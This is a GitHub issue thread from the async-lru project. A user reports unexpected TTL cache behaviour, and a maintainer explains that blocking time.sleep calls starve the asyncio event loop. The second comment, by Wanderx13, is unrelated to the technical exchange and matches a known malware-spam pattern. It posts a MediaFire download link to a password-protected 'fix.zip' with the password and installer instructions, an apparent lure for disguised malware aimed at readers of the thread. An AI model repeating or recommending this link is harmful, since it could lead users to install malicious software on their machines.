### ISSUE TITLE
TTL error?

### ISSUE THREAD

**Issue by Danipulok** [aio-libs/async-lru#609]
Hey here. It seems there's some error with TTL?
```python
import asyncio
import random
import time

from async_lru import alru_cache


@alru_cache(ttl=2 / 129)  # always other
# @alru_cache(ttl=2 / 128)  # always same
async def get_int() -> int:
    return random.randint(1, 100)


async def main():
    res1 = await get_int()
    print(1, res1)
    res2 = await get_int()
    print(2, res2)
    res3 = await get_int()
    print(3, res3)

    time.sleep(3)

    res4 = await get_int()
    print(4, res4)
    res5 = await get_int()
    print(5, res5)
    res6 = await get_int()
    print(6, res6)


if __name__ == "__main__":
    asyncio.run(main())
```

When I have `always other` enabled, output is:
```
1 86
2 3
3 54
4 20
5 61
6 35
```

When I have `always same` enabled, output is:
```
1 100
2 100
3 100
4 100
5 100
6 100
```

Is it supposed to be like this or is this a bug?
And it not TTL supposed to be in seconds?

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Dreamsorcerer** [comment]
You'll have to provide more information (your environment etc.) as your example works fine for me in both examples, with the only change being `await asyncio.sleep(3)`. If you use a blocking function, then you're not allowing asyncio to execute properly, so the timeout may not be handled as you expect.

**Comment by Danipulok** [comment]
Thank you for quick response, and sorry for being late!

Here are my specs:
```
python version: 3.12.3 (tags/v3.12.3:f6650f9, Apr  9 2024, 14:05:25) [MSC v.1938 64 bit (AMD64)]
platform: Windows-10-10.0.19045-SP0
async-lru==2.0.4
```

**Comment by Dreamsorcerer** [comment]
It is in seconds, I'm not sure what you're not understanding?

**Comment by Danipulok** [comment]
When using `time.sleep` on my setup, for some reason, values like `ttl=1/64` invalidated cache somehow.
As I specified in example:
```
@alru_cache(ttl=2 / 129)  # always other value
# @alru_cache(ttl=2 / 128)  # always same value
```

With `asyncio.sleep` everything works as expected. Thank you for specifying and checking.

So I guess the point of this issue is that on Windows + `time.sleep` cache does not work as expected, but I guess it's windows issue and python related, not `async-lru`.

Here's the final example that for me works unexpectedly:
```python
import asyncio
import random
import time
from async_lru import alru_cache

@alru_cache(ttl=1)
async def get_int() -> int:
    return random.randint(1, 100)

async def main():
    print(await get_int())
    print(await get_int())

    # await asyncio.sleep(2)  # works as expected
    time.sleep(2)  # cache is not expired
    print("Should expire cache")

    print(await get_int())
    print(await get_int())

if __name__ == "__main__":
    asyncio.run(main())
```

Thank you so much for replying and checking this!
I guess this issue can be closed then as python-related

**Comment by Dreamsorcerer** [comment]
Well, the issue is that you're not using asyncio correctly (you need to avoid blocking the event loop for more than around 100ms at a time). If you run with dev mode and warnings etc., then you'd have received a warning telling you that the function took too long. I do development work with `python -bb -X dev -We` (change `-We` to `-Wall` to display warnings without erroring, if that's too strict).

I was still confused with your `2 / 129` version, I don't think the cache should have been invalidated in that version and you should have received the same results.
